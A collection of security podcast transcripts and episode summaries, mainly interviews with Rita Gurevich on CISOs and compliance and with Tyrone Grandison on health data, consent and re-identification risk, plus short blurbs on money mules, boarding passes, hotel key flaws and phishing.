Rita Gurevich: I think the C-Suites, primarily the CISO, has a very different job now than maybe they used to. Honestly, I don't envy CISO's right now. You have a bad breach, your whole background is going to be on the front page of the paper. It's not just that your company will get fined. Your background, your history, where you work, what your college major was is going to be out there for everyone to dissect and criticize, okay? That is not a position that most people are comfortable with. So I think CISO's now more than ever recognize that the job that they chose and the career that they chose has to be proactive. They have to be on the front lines. They have to think about things in smarter ways. So, I think that we're going to see a shift in CISO's where it's going to be the best of the best of the best. I think that a lot of companies took for granted the need for highly skilled leaders within information security, and they're starting to see companies and what happens to them once a major attack occurs, and I think that is going to change.
Now, the other challenge was, I think with companies is that many of them placed one person at the helm, and they started to build out these teams, and honestly, it's not enough. There are way too many threats. There are way too many options. There are honestly way too many vendors that are potentially offering options for one person to be making those decisions. So, what I see happening is that there is going to be subject matter CISO's across the company, where there's many people with that title that become experts in very specific domains. So, I think that information security is potentially in terms of employee count is going to eventually exceed all of just general IT, because I think that that's becoming more of a priority than up time and availability of systems is making sure that the internal people aren't doing things that they shouldn't be doing, and that you're doing everything in your power to prevent anybody from the outside getting in that shouldn't be getting in.
Cindy Ng: It's been said that information security is really just compliance but not security. Is that ball thrown out the window after people have realized how serious information security is?
Rita Gurevich: That's a great question. I'm gonna give you another, another story. I was on the phone with a CISO, he's the CISO of one of the largest manufacturing companies, and we were talking about his agenda for the year. And he recently started at that company and was told that his mandate was compliance, and maybe this is because the company struggled with compliance in the past, but he immediately said if my mandate is compliance, I don't want the job. You know, that is not what I should be focusing on. And the challenge with focusing solely on compliance as he put it, is that actually leaves you more exposed. Compliance is about a checklist and often that checklist is very subjective, and often the people who are verifying whether you've completed that checklist are ranging in levels of expertise. I mean we have customers that are the 1000 person shop all the way to the 100,000 person shop, and we as outsiders can see the difference in caliber of the people that are coming in from the outside from the regulatory bodies checking on them is vastly different. Just because you've checked the box, it doesn't mean that you have good security. And it’s good security that’s going to minimize your risk. And you have to think about security first. If you think good security will drive compliance and not the other way around, you’re still going to achieve the goal of good compliance, but you’re also going put the right preventative controls to minimize a data breach or some other cybercrime.
Cindy Ng: Lets talk more about your company, SPHERE. I wonder what the mission of your company is?
Rita Gurevich: The mission of SPHERE is to help companies take control of their data, their systems, and their assets. What that means is to give them visibility that they need, understanding what they have, what they need to protect, and how they need to protect it. Along with giving them a SWOT team approach, helping them remediate issues that they have. And also put tooling in place to allow them to manage their environments effectively, in house. A lot of companies have no idea where to start, in terms of looking at data governance. They have no idea what needs to be remediated or fixed or how IAM workflows work. Or they have no idea what threats privileged accounts are posing for their organizations because they don’t have threat level visibility. And once we get them the visibility. A lot of times, they need a one time SWOT team approach to clean up the environment. And it’s something that we also do. And we also partnered with different vendors, and obviously Varonis is one of the most strategic partners we’ve partnered with. We offer tooling to help people manage their environment on their own with their own resources long-term. We also have our own solution called, "Sphereboard", which integrates with Varonis, along with a handful of other best of technologies to provide a single pane of glass to your data, your system, and your assets.
Cindy Ng: So, you don't curate a list of vendors for your different clientele to meet their needs? It's more like here's what we know all companies need. Here's what we can provide for you. Because sometimes your clients don't know that certain technologies might exist, you're essentially giving them one panel of "here's everything you need to know."
Rita Gurevich: Yeah, that's exactly right, and we're by no means a VAR where we have a portfolio of, you know, 100 different products, and then we switch them out as we need to. We really invest in the relationship that we built with our partner network, and with the companies that we've integrated our solution with, and that's important because you need to have consistency. And if you want a solution to be sticky, it has to be relevant, and it has to answer the right, the right questions, and there has to be a history of that company doing things the right way. There's going to be a lot of disruptions within this industry, and there's going to be a lot of companies that are coming into the space. They're offering really cool widgets and gadgets and all that good stuff that probably aren't going to be around in a year or two. That's just the nature of entrepreneurship and innovation, but they're are going to be plenty of those that come around and stick around, but the relationship that we formed and the partners that we've worked with are ones that we've been working with now for a really long time, way before anyone even thought something like Equifax could happen. So, we've been solving this problem way before it was cool, and we're gonna continue to offer that, and be more innovative, and continue to solve problems for our customers.
Cindy Ng: Have you ever figured out in speaking with, say like, after 10 vendors, you realize, "Oh, we're missing X, Y, and Z products, and I'm gonna go find a vendor to see if there's anyone I can work with?"
Rita Gurevich: Yeah, at times, but I think it happens a little bit more naturally than that. I think that it's first about the problem statement, so I'll give you an example. The last area that we've added to our portfolio more officially is privileged access management, and, you know, our focus was, of course, on the traditional challenges with password vaulting and the such, but really from a Sphere perspective, we were noticing challenges of deploying those solutions in terms of understanding what privileged accounts exist in my environment, whether it's in my Unix environment, on my Window server, my databases, etc., and who owns those accounts, and who do I need to educate on a new way of working? So, it's not necessarily about the products that will, you know, do password vaulting, or record recessions, or whatever the tools may do, it's more about kind of the people on the process, and all the work that needs to be done ahead of that. So, I think out expertise comes with that. Now, there's no doubt in my mind that CyberArk isn't the leader in that space, and we decided to partner with CyberArk because of that. But, that being said, our solution for privileged access management is not just to recommend a tool, it's to create a process, to create an end-to-end solution that includes a one time remediation effort. That maybe includes process change that maybe includes training that maybe includes, you know, health checks, and then, of course, there's also the software element of this. Most companies cannot manage this manually. You need the right tooling, so there's definitely tooling recommendations. So, I think looking at the problem end-to-end, the products and the vendors who we decide to work with for specific initiatives naturally fall into place.
Cindy Ng: What are upcoming plans for Sphere?
Rita Gurevich: Definitely growth in mind. I get bored easily, so, so growth strategy is always on the forefront of my mind. so, what we're focusing on is a couple different areas. The first is geographical expansion. We opened up our London office this year. That's going really well, and essentially just replicating the message here out there. There's all sorts of requirements out there in terms of GDPR, and just overall data security that companies out there need just as much as they need here. Also, our products, so SPHEREboard is our baby. We came out with our product about two years ago, and it's a culmination of just years of experience of being in the field from a services perspective, so just building more connectors, having more tools feed into that, and pumping out all sorts of really cool analytics for our customers to leverage. So, those are the two areas that we're focusing on, and you're gonna see a lot about Sphere in the next year.
Cindy Ng: Sounds great. Thanks Rita.
Critical systems once operated by humans are now becoming more dependent on code and developers. There are many benefits to machines and automation such as increased productivity, quality and predictability.
But when websites crash, 911 systems go down or when radiation-therapy machines kill patients because of a software error, it’s vital that we rethink our relationship with code and as well as the moral obligations of machines and humans.
Should developers who create software that impact humans be required to take a ‘do no harm’ ethics training? Should we begin measuring developers by the functionality they create as well as security and moral frameworks they’re able to provide?
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Kris Keyser, Mike Buckbee
Outlined in the National Cyber Security Centre’s “Cyber crime: understanding the online business model,” the structure of a cybercrime organization is in many ways a lot like a regular tech startup. There’s a CEO, developer, and if there are enough funds, an IT department.
However, one role outlined on an infographic on page nine of the report that was a surprise and does not exist in legitimate businesses. This role is known as a “money mule.” Vulnerable individuals are often lured into these roles with titles such as “payment processing agents” or “money transfer agents.”
But when “money mules” apply for the job and even after they get the job, they’re not aware that they are being used to commit fraud. Therefore if cybercriminals get caught, “money mules” might also get in trouble with law enforcement. The “money mule” can expect a freeze on his bank account, face possible prosecution, and might be responsible for repaying for the losses. It might even be on your permanent record.
Other articles and threads discussed:
Panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Mike Thompson
By now, we’re all aware that many of the platforms and services we use collect and store information about our data usage. Afterall, they want to provide us with the most personalized experience.
So when I read that an EU Tinder user requested information about her data and was sent 800 pages, I was very intrigued with the comment from Luke Stark, a digital technology sociologist at Dartmouth University, “Apps such as Tinder are taking advantage of a simple emotional phenomenon; we can’t feel data. This is why seeing everything printed strikes you. We are physical creatures. We need materiality.”
He is on to something. We don’t usually consider archiving stale data until we’re out of space. It is often through printing photos, docs, spreadsheets, and pdfs that we would feel the weight and space consuming nature of the data we own.
Stark’s description of data’s intangible quality led me to wonder how weightless data impacts how we think about data security.
For instance, when there’s a power outage, some IT departments aren’t deemed important enough to be on a generator. Or when Infosec is often seen as a compliance requirement, not as security. Another roadblock security pros often face is when they report a security vulnerability – it’s not usually well received.
Podcast panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Mike Thompson
While some regard Infosec as compliance rather than security, veteran pentesters Sanjiv Kawa and Tom Porter believe otherwise. They have deep expertise working with large enterprise networks, exploit development, defensive analytics and I was lucky enough to speak with them about the fascinating world of pentesting.
In our podcast interview, we learned what a pentesting engagement entails, assigning budget to risk, the importance of asset identification, and so much more.
Regular speakers at Security Bsides, they have a presentation on October 7th in DC, The World is Y0ur$: Geolocation-based Wordlist Generation with Wordsmith.
Ofer Shezaf is Director of Cyber Security at Varonis. A self-described all-around security guy, Ofer is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel's elite Technion University.
In this second part of the interview, we explore ways to improve data security through security by design techniques at the development stage, pen testing, deploying Windows 10s, and even labeling security products!
Ofer Shezaf is Director of Cyber Security at Varonis. A self-described all-around security guy, Ofer is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel's elite Technion University. In this first part of the interview, Ofer shares his thoughts on the changing threat landscape.
Dr. Tyrone Grandison has done it all. He is an author, professor, mentor, board member, and a former White House Presidential Innovation Fellow. He has held various positions in the C-Suite, including his most recent role as Chief Information Officer at the Institute of Health Metrics and Evaluation, an independent health research center that provides metrics on the world's most important health problems.
In our interview, Tyrone shares what it’s like to lead a team of forty highly skilled technologists who provide tools, infrastructure, and technology to enable researchers develop statistical models, visualizations and reports. He also describes his adventures on wrangle petabytes of data, the promise and peril of our data economy, and what board members need to know about cybersecurity.
Cindy Ng: Often times, the bottom line drives businesses forward, where your institute is driven by helping policy makers and donors determine how to help people live longer and healthier lives. What is your involvement in ensuring that that vision is sustained and carried through?
Tyrone Grandison: Perfect. So I lead the technology team here, which is a team of 40 really skilled data scientists, software engineer, system administrators, project and program managers. And what we do is that we provide the base, the infrastructure. We provide tools and technologies that enable researchers to, one, ingest data. So we get data from every single country across the world. Everything from surveys to censuses to death records. No matter how small or poor or politically closed a country is. And we basically house this information. We help the researchers develop statistical models. Like, very sophisticated statistical models and tools on them that make sense of the data. And then we actually put it out there to a network of over 2,400 collaborators.
And they help us produce what we called the Global Burden of Disease that, you know, shows what in different countries of the world is the predominant thing that is actually shortening lives in particular age groups, for particular genders and all demographic information. So, now people can, if they wanted to, do an apples-to-apples comparison between countries across ages and over time. So, if you wanted to see the damage done by tobacco smoking in Greece and compare that to the healthy years lost due to traffic injuries in Guatemala, you can actually do that. If you wanted to compare both of those things with the impact of HIV in Ghana, then that's now possible. So our entire thing is, how do we actually provide the technology base and the skills to, one, host the data, support the building of the models and support the visualization of it. So people can actually make these comparisons.
Cindy Ng: You're responsible for a lot and let's try to break it down a bit. When you receive a bunch of data sets from various sources, take me through what your plan is for it. Last time we spoke, we spoke about obesity. Maybe is that a good one to, that everyone can relate to and with?
Tyrone Grandison: Sure. So, say we get a obesity data sets from either the health entities within a particular country. It goes through a process where we have a team of data analysts look at the data and extract the relevant portions of it. We then put it into our ingesting pipeline, where we then vet it. Vet it in terms of what can it apply to. Does it apply to specific diseases? Obviously, it's going to apply to a specific country. Does it apply to a particular age group and gender? From that point on, we then include it in models. And we have our modeling pipeline that does everything from estimating the number of years lost from obesity in that particular country. Also, as I mentioned before, it actually sees if that particular statistic that we got from that survey is relevant or not.
From there, we basically use it to figure out, okay, well what is the overall picture across the world for obesity? And then, we visualize it and make it accessible. And provide people with the ability to tell stories on it with the hope that at someone point, a policymaker or somebody within the public health institute within a particular country is gonna see it and actually use it in their decision making in terms of how to actually improve obesity in their particular country.
Cindy Ng: And when you talk about relevant and modeling, people say in the industry that there is a lot of unconscious bias. How do you reconcile that? And how do you work with certain factors that people think is controversial? For instance, people have said that using a body mass index isn't accurate.
Tyrone Grandison: That's where we actually depend a lot on the network of collaborators that we spoke about. Not only do we have like a team that has been doing epidemiology and can advance the population health metrics for, you know, over two decades. We do depend upon experts within each particular country once we actually produce, like, you know, the first estimates based upon the initial models to actually look at these estimates and say, "Nope. This does not make sense. We need to actually adjust your model to add a factor in, that same unconscious bias." Or, to kind of remove that the model says that we're seeing but that the model may need to be tweaked or is wrong about. It all boils down to having people vet what the models are doing.
So, it's more along the lines of how do you create systems that are really good at human computation. Marrying the things that machines are good with and then putting in a step there that forces a human to verify and kind of improve the final estimate that you want to actually want to produce.
Cindy Ng: Is there a pattern that you've seen over time where time and time again, the model doesn't count for X, Y and Z? And then, the human gets involved and then figures out what's needed and provides the context? Is there a particular concept or idea that you've seen?
Tyrone Grandison: There is. And there is to the point where we basically have included it in our initial processing. So, there is this concept, right. The idea of a shock. Where a shock is an event that models cannot predict and it may have wide ranging impact essentially on what you're trying to produce. So, for example, you could consider the earthquake in Haiti as a shock. You could consider the HIV epidemic as a shock. Every single country in any one given year may have a few shocks depending upon what the geolocation is that you're looking at. And again, the shocks are different and we are really grateful to the collaborative network for providing insight and telling us that, "Op, this shock is actually missing from your model for this particular location, for this particular population segment."
Cindy Ng: It sounds like there's a lot of relationship building, too, with these organizations because sometimes people aren't so forthcoming with what you need to know.
Tyrone Grandison: So, I mean, it's relationship building over the work that we've been doing here has been going on for 20 years. So, imagine 20 years of work just producing this Global Burden of Disease. And then, probably another decade or two before that just building the connections across the world. Because our Director has been in this space for quite a while now. He's worked at everywhere from WHO to the MIT doing this work. So, the connections there and the connections from the executive team have been invaluable in making sure that people actually speak candidly and honestly about what's going on. Because we are the impartial arbiters of the best data on what's happening in population health.
Cindy Ng: And it certainly really helps when it's not driven by the bottom line. It's the most important thing is to improve everyone's health outcome. What are the challenges of working with disparate data sets?
Tyrone Grandison: So, the challenge is the same everywhere, right? The set challenges all relate to, okay, well, are we talking about the same things? Right. Are talking the same language? Do we have the same semantics? Basic challenge. Two is, well, does the data have what we need to actually answer the question? Not all data is relevant. Not all data is created equal. So, just figuring out what is gonna actually give us insight into, you know, the question as to how many years do you lose for a particular disease? And the third thing which is pretty common to, you know, every field that is trying tot push into the data open data areas. Do we have the right facets in each data set to actually integrate them? Does it make sense to integrate them at all? So, the challenges are not different from what the broader industry is facing.
Cindy Ng: You've developed relationships for over 20 years. Back then, we weren't able to assess so many different, I'm guessing billions and trillions of data sets. Have you seen the transition happen? And how has that transition been difficult? And how has it made your lives so much better?
Tyrone Grandison: Yeah. So, the Global Burden of Disease actually started on a cycle that was, you know, when we had considered we had enough data to actually make those estimates, we would actually produce the next Global Burden of Disease. Right, and we just moved starting this year to an annual cycle. So, that's the biggest change. The biggest change is because of the wealth of data that exists out there. Because of the advances of technology, now we can actually increase the production of this data asset, so to speak. Whereas before, it was a lot of anecdotal evidence. It was a lot of negotiation to get the data that we actual need. Now, in other far more open data sets. So, lots more that's actually available.
A willingness due to prior past demonstrations of the power of home data for governments and people to actually provide and produce them, because they know that they can actually use them. It's more of the technology hand-in-hand with the cultural change that's happened. That's been the biggest changes.
Cindy Ng: What have you learned about wrangling petabytes of data set?
Tyrone Grandison: A lot. In a nutshell, it's very difficult and if I was to say that I give advice to people, I would start with, so what's the problem you're trying to solve? What's the mission you're trying to achieve? And figure out what are the things that you need in your data sets that would help you answer that question or mission. And finally, as much as possible, stick with standardize and simplify kind of methodology. Leverage a standard infrastructure and a standard architecture across what you are doing. And make it dead simple because if it's not standard or simple, then getting to scale is really difficult. And scale meaning processing tens, hundreds of petrabytes worth of data.
Cindy Ng: There are a lot of health trackers, too, where they're trying to gather all sorts of data in hopes that they might use it later. Is that a recommended best practice approach for figuring your solution or the problem out? Because, you know, what if you didn't think of something and then a new idea popped into your head? And then there's a lot of controversy with that. What is your insight...
Tyrone Grandison: A controversy is, in my view, actually very real. One, what is the level of data that you are collecting, right? So, at IHME, like, we're lucky to be actually looking at population level data. If you're looking at or collecting individual records, then we have a can of worms in terms of data ownership, data privacy, data security. Right. And, especially in America, what you're referring to is the whole argument around secondary use of health data. The concern or issue is just like with HIPAA, the Healthcare Information Portability and Accountability Act. You're supposed to just have data for one person for a specific purpose and only that purpose. The issue or concern, like, you just brought up is, one, a lot of companies actually view data that is created or generated on the particular individual as being their own property. Their own intellectual property. Which you may or may not agree with.
At some point, there's no tack list that says the person who this data is about should actually have a say in this in the current model, the current infrastructure. Right. And I can just say it like, personally, I believe that if the data is about you, that data's created by you, then technically you should own it. And the company should be good stewards of the data. Right. Being a good steward simply means that you're going to use the data for the purpose that you told the owner that you're going to use if for. And that you will destroy the data after you finish using it. If you come up with a secondary use for it, then you should ask the person again, do they want to actually participate in it?
So, the issue that I have with it is basically is the disenfranchisement of the data owner. The neglection of like consent or even asking for it to be used in a secondary function or for a secondary purpose. And the fact that there are inherent things in that scenario with that question that are still unresolved and are just assumed to be true that people just need to look at.
Cindy Ng: When you say when the project is over, how do you know when the project is over? Because I can, for instance, write a paper and keep editing and editing and it will never feel completed and done.
Tyrone Grandison: Sure. So, it's... I mean, put it this way. If I say to the people that are involved in a particular study or that gave me their data, that I want to use this data to test a hypothesis and the hypothesis is that drinking a lot of alcohol will cause liver damage. Okay, obvious. And I, you know, publish my findings on it. It gets revised. You know, that at the very end, there has to be a point where either the papers published in the journal are somewhere or not. Right. I'm assuming. If that's the case and, you know, I publish it and I found out that, hey, I can actually use the same data to actually figure out the affects of alcohol consumption on some other thing. That is a secondary purpose that I did not have an agreement with you on, and so I should actually ask for your consent on that. Right.
So, the question is just not when is the task done, but when have I actually accomplished the purpose that I negotiated and asked you to use your data for.
Cindy Ng: So, it sounds like that's the really best practice when you're gathering or using someone's personal data. That that's the initial contract. If there is a secondary use that they should also know about it. Because you don't want to end up in a situation like Henrietta Lacks and they're using your cells and you don't even know it, right?
Tyrone Grandison: Yup. But Henrietta Lacks actually is like a good example. It highlights what the current practices of the industry. Right. And again, luckily published health does not have this issue because we have aggregated data on different people. But like in the general healthcare scenario where you do have individual health records, what companies are doing and what they did within, in the Henrietta Lacks case was they may have actually specified in some legal document that, "Hey, we're gonna use your information for X, and X is the purpose." And they make either X so broad, so general that in encompasses like every possible thing that you can imagine. Or, they basically say, "We're going to do a really specific purpose and anything else that we find." And that is now the common practice within the field. Right?
And to me, the heart of that is very, seems very deceptive. Right. Because you're saying to somebody that, you know, we have no idea what we're going to do with your data, we want access to do it and, oh, we assume that you're not going to own it. That we assume that any profits or anything that we get from it is going to be ours. Do you see the model itself just seems perverse? It's tilted or veered towards how do we actually get something from somebody for free and turn it into a asset for my business. Where I have carte blanche to do what I want with it. And I think that discussion has not happened seriously by the healthcare industry.
Cindy Ng: I'm surprised that businesses haven't approached your institution in assisting with this matter.Well, just it sounds like it would make total sense because I'm assuming that all of your data perhaps might have all the names and PHI stripped.
Tyrone Grandison: We don't even get to that level at this point.
Cindy Ng: Oh, you don't even...
Tyrone Grandison: It's information on a generalized level. So there are multiple techniques that you can actually use to, let's say, protect privacy for people. Like, one, would be just suppression. Okay, so I suppress the things that I call or consider PII. Or the other is like generalization. Right. So, it's basically, I'm going to look at or get information that is not at the most granular level. But it's at the level above it. Don't look like you and all your peers. You just go a level above this and say, "Okay. Well, let's look at everyone that lives in a particular zip code or a particular state or country." So, that way, you have protection from hiding in a crowd. So, you can't really identify one particular person in a data set itself. So, at IHME we don't have the PHI/PII issue because we work on generalized data sets.
Cindy Ng: You've held many different roles. You've been a CDO, a CIO, a CEO. Which role do you enjoy doing most?
Tyrone Grandison: So, any role that actually allows me to do two things. Like, one, create and drive the direction or strategy of an organization. And, two, enables me to help with the execution of that strategy to actually produce things that will positively impact people. The roles that I have been fond of so far would be CEO and CIO because at those levels, you basically also get to set what the organizational culture is, which is very valuable in my mind.
Cindy Ng: And since you've also been a board member, what do you think the board needs to know when it comes to privacy in cyber security?
Tyrone Grandison: First of all, I think it should be an agenda item that you deal with upfront and not after a breech or an incident. It should be something that you bake into your plans and into the product life cycle from the very beginning. You should be proactive in how you actually view it. The main things I've actually noticed over time is just like, people do not pay attention to privacy, cyber security, cyber crime until, you know, after there is a... This is a horrible analogy but until there's a dead body in the sea. What happened? And then you start having reputational damage and financial damage because of it.
When, you know, thinking about the process technology, people and tools that would actually help you fix this from the very get-go would have actually saved you a lot of time. And, you know, the whole perception, not perception, but the whole thought of both of these things, privacy and security, being cost centers, you don't see a profit from them. You don't see revenue being generated from them. And you only actually see the benefit, the cost savings, so to speak, after everyone else has actually been breached or damaged from an episode and you're not. Right. Yeah. It's a little bit more proactive upfront rather than reactive and, you know, post-fact.
Cindy Ng: But do you also think that it's been said that IT make technology now more complicated than it really is? And they're unable to follow what the IT presenting and so they're confused, and there's not a series of steps you can follow? Or maybe they asked for a budget for the one thing one year and then want some more money next year. And as you said, it costs money. But do you also think that there's a value proposition that's not carried across in a presentation? How can the point be driven home then?
Tyrone Grandison: So, I mean, the biggest thing you just identified a while ago is the language barrier. The translation problem. So, I don't fundamentally believe that anyone tech or otherwise is purposely trying to sound complex. Or purposely trying to confuse people. It's just a matter of, you know, you have skilled people in a field or domain. Whatever the domain is. So, if you went tomorrow and started talking to a oncologist or a water engineer, and they just went off and just uses a bunch of jargon from their particular fields. They're not trying to be overly complex. They're not trying to not have you understand what they're doing. But they've been studying this for decades. And they're just, like, so steeped in it that that's their vocabulary.
So, the number one issue is just that, one, understanding your audience. Right. If you know that your audience is not tech or is from a different field or a different era in tech or is the board, and understanding the audience and knowing what their language is and then translating your language lingo into things that they can understand, I think that would go a long, long way in actually helping people understand the importance of privacy and cyber security.
Cindy Ng: And we often like to make the analogy of that we should treat data like money. But do you think that data can be potentially be more valuable than money when the attacks aren't deterrent financially driven then they're out to destroy data, instead? We react in a really different way, I wanted to hear your thoughts on the analogy of data versus money.
Tyrone Grandison: Interesting. So, money is just a convenient currency. Right. To enable a trade. And money has been associated with giving value to certain objects that we consider important. So, I'm viewing data. And data as something that needs to have a value assigned to it. Right. Which money is going to be that medium. Right. Whether the money is actual physical money or it's Bitcoin. So, I don't see the two things being in conflict. Or the two things having a comparison between value. I just think that data is valuable. A chair is valuable. A phone is valuable. Money is just, like, that medium that allows us to have one standard unit to compare the value between all those things.
Is data going to be more valuable than the current physical IT assets that a company has? Overtime, I think, yes. Because the data that you're using, that you're hopefully going to be using is going to be driving more, one, insights. More, hopefully, revenue. More creative uses of the current resources. So, the data itself is under influence how much of the other resources that you will actually acquire or how much of the other resources you need to place in particular spots or instances or allocate across the world. So, I see data as a good driving force to making these value driven decisions. So, I think the importance of it versus the physical IT assets is going to increase over time. You can see that happening already. To say data is more valuable than cash. I'm not too sure that's the right question.
Cindy Ng: We've talked about the value of data, but what about the data retention and migration? It's sort of dull, but yet so important.
Tyrone Grandison: Well, multiple perspectives here. Data retention and migration is important for multiple reasons. Right. And the importance normally lies in risk. In minimizing the risk or the harm that can potentially be done to the owner or the data, or the subjects that are referenced too in the data sets. Right. That's all the importance. That's why you have whole countries, states actually saying that they have a data retention policy or plan. And that means that after a certain time, either the stuff has to be gone, completely deleted, or be stored somewhere that is secure and not well accessible.
And the whole premise of it is just like you assume for a particular period of time, that companies are going to need to use that data to actually accomplish a purpose that they specified initially, but then after that point, the risk or the potential harm of that becomes so high that you need to do something to reduce that risk. And that thing normally is a destruction or migration somewhere else.
Cindy Ng: What about integrating that data set with another, so probably a secondary use, but integrating it with other institutes? I hear that people want a one health solution in terms of patient data. So that all organizations can access it. It's definitely a risk. But is that something that you think is a good idea that we should even entertain it? Or we're going to create a monster and that the results of having a one single unit, a database where everything and all the data integrates is a bad solution? It's great for analytics and technology and use.
Tyrone Grandison: I agree with everything you just said. It's both. So, it's for certain purposes and scenarios, you know, is good. Because you get to see new things and you get a different picture, a better picture, a more holistic picture once you integrate data sets. That being said, once you get data sets, you basically also, you increase the risk profile of the results in data sets. And you lower the privacy of the people that are referenced in the data sets. Right. The more data sets you integrate...
So there's this paper that a colleague of mine, Star Ying and I wrote, like last year or the year before last. That basically says there's no privacy in big data. Simply because, like, big data you assume the three Vs. So, velocity, volume and variety. As you actually add more and more data sets in to get, like, a larger, just say, like a larger big data sets, as we call it. What you have happening is that you have the things that actually can be uniquely combined to identify the subject in that larger, big data set becomes larger and larger.
So, I mean, a quick, let me see what the quick example would be. So, if you have access to toll data, you have access to the data of, you know, people that are going on, you know, your local highway or your state highway. And you have the logs of when a particular car went through a certain point. The time, the license plates, the owner. All that stuff. So, that's one data set by itself. You have a police data set that had a list of crimes that happened in particular locations. And you pick something else. You have a bunch of records from the DMV that tell you when somebody actually came in to actually have some operations in. All by themselves very innocuous. All by themselves if you anonymized them, or put techniques on them to protect the privacy of the individuals. Perfectly. Okay. Perfectly safe. Right. Not perfectly but relatively.
If you start combining the different data sets just randomly. You combine the toll data with the police data. And you found out that there's a particular car that was at a scene of a crime where somebody was murdered. And that car was at a toll booth that was nearby, like, one minute afterward. Now you have something interesting. You have interesting insight. So that's a good case.
We want to actually have this integration be possible. Because you get insights that you couldn't get from just having that one data set itself. If you start looking at other cases where, you know, somebody wants to actually be protected, you have, and this is just within one data set, you have a data set of all the hospital visits across four different hospitals for a particular person. What you can do if you start merging them is that you can actually use the pattern of visits to uniquely identify somebody. If you start merging that with, again, the transportation records and that may be something that gives you insight as to what somebody's sick with. That may be used...
You can identify them first of all, which they don't want to do because they went to one hospital. And that would be used to actually do everything, something negative against him. Like deny them insurance or whatever the used case is. But you see, like in multiple different cases, the, one, the privacy of individuals that can hold the...is actually decreased. And, two, it can be used for, you know, positive or negative purposes. For and against the individual data subject or data owner.
Cindy Ng: People have spoken about these worries. How should we intelligently synthesize this information? Because it's interesting, it's worrisome. But it can be also be very beneficial. Because we tend to sensationalize everything.
Tyrone Grandison: Yup. That's a good question. So, I mean, I would say to look at the things the major decisions in your life that you plan to be making for the next couple of years. And then look at the tools, software, things that you have online right now that potential employer may actually look at. Then not employer but a potential person that you're looking could...to do something with, get a service from. May actually look at to evaluate whether you get the service or not. Whether it be getting a job or getting a new car. Whatever it is. Whatever that thing is that, you know, want to actually get done.
And you know, see if the current things, the current questions that the person on the other side will be asking and looking at. Would that be interpreted negatively on you? A quick example would just be, okay, you're a Facebook user and look at all the things that you do on there and all the kinda good apps that you have. And then look at who has access to all that. And in those particular instances, is that going to be a positive with that interaction or a negative with that interaction? I mean, I think that's just being responsible in the digital age, right?
Cindy Ng: Right. What is a project that you're most proud of?
Tyrone Grandison: I'm proud of a lot of things. I'm proud of the work that we do here at IHME. I think it's going breaking work that's gonna help a lot of people. The data that we produce have actually been used to do pollution legislation. And numbers come out. Different ministers see it. The Ministry in China saw it and said, "Oh, we have an issue here. And we need to actually figure out how do we actually improve our longevity in terms of carbon emission."
We've had the same thing Africa where there was somebody from the Ministry. I think it was, sorry, was it at Gambia or Ghana. I'll find out for you afterwards. And they saw the numbers from, like, deaths due to in-house combustion. And started a program that gave a few hundred, well, a few thousand pots to different households and within like a few years, I saw that number went down. So, literally saving lives.
I'm proud of the White House Presidential Innovation Fellows. That group of people that I work with two and a half years ago. The work that they did. So,one of the fellows in my group worked with the Department of Interior to increase the number of kids that were going to National Parks. And, you know, they did it by actually going out and talking to kids and figuring out, like, what the correct incentive scheme would be. To actually have kids come to the park when they had their summer breaks. And that program is called, like, Every Kid in the Park. And it's hugely successful about getting people, kids and parents like connected back into nature in life. Right. I'm proud of the work the commerce did of service team at the Department of Commerce. And that did help a lot of people.
We routinely just created data products with the user, the average American citizen in mind. And, like, one of the things that I'm really so proud of is that we helped them democratize and open up U.S. Census Bureau data. Which, you know, is very powerful. It's actually freely open to everybody and it's been used by a lot of businesses that make a lot of money from sending the data itself. Right. So we looked at and exposed that data through something called a CitySDK and, you know, that led to everything from people building apps to help food trucks find out where demand was. To people building websites to help accessibility channels people to figure out how to get around particular cities. To people helping supermarkets to figure out how to get fresh foods to communities that didn't have access to them. That was awesome to actually see.
The other thing was exposing the income inequality data and just like showing people that, like, the narrative that like people are hearing about the gender and the race inequality amongst different professionals is actually far worse than is actually mentioned out there in the public. So, I mean, I'm proud of all of it because it was all fun work. All impactful work. All work that hopefully helped people.
We’re a month away from Halloween, but when a police detective aptly described a hotel hacker as a ghost, I thought it was a really clever analogy! It’s hard to recreate and retrace an attacker’s steps when there are no fingerprints or evidence of forced entry.
Let’s start with your boarding pass. Before you toss it, make sure you shred it, especially the barcode. It can reveal your frequent flyer number, your name, and other PII. You can even submit the passenger’s information on the airline’s website and learn about any future flights. Anyone with access to your printed boarding pass could do harm and you would never know who your perpetrator would be.
Next, let’s assume you arrive at your destination and the hotel is using a hotel key with a vulnerability. In the past, when hackers reveal a vulnerability, companies step up to fix it. But now, when systems need a fix and a software patch won’t do, how do we scale the fix for millions of hardware on hotel keys?
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Forrest Temple, Mike Buckbee
Do you keep holiday photos away from social media when you’re on vacation? Security pros advise that it's one way to reduce your security risk. Yes, the idea of an attacker mapping out a route to steal items from your home sound ambitious. However, we’ve seen actual examples of a phishing attack as well as theft occur.
Alternatively, the panelists point out that this perspective depends on how vulnerable you might be. If attackers need an entry and believe that you’re a worthy target is vastly different from the general noise of regular social media sharers.
Other articles discussed:
Panelists: Cindy Ng, Mike Thompson, Forrest Temple, Mike Buckbee
How long does it take you to tell the difference between fried chicken or poodle? What about a blueberry muffin or Chihuahua? When presented with these photos, it requires a closer look to differentiate the differences.
It turns out that self-driving car cameras have the same problem. Recently security researchers were able to confuse self-driving car cameras by adhering small stickers to a standard stop sign. What did the cameras see instead? A 45 mph speed limit sign.
The dangers are self-evident. However, the good news is that there are enough built-in sensors and cameras to act as a failsafe. But followers of our podcast know that other technologies with other known vulnerabilities might not be as lucky.
Other articles discussed:
Panelists: Cindy Ng, Jeff Peters, Kris Keyser, Mike Buckbee
Dr. Zinaida Benenson is a researcher at the University of Erlangen-Nuremberg, where she heads the "Human Factors in Security and Privacy" group. She and her colleagues conducted a fascinating study into why people click on what appears to be obvious email spam. In the second part of our interview, Benenson offers very practical advice on dealing with employee phishing and also discusses some of the consequences of IoT hacking.
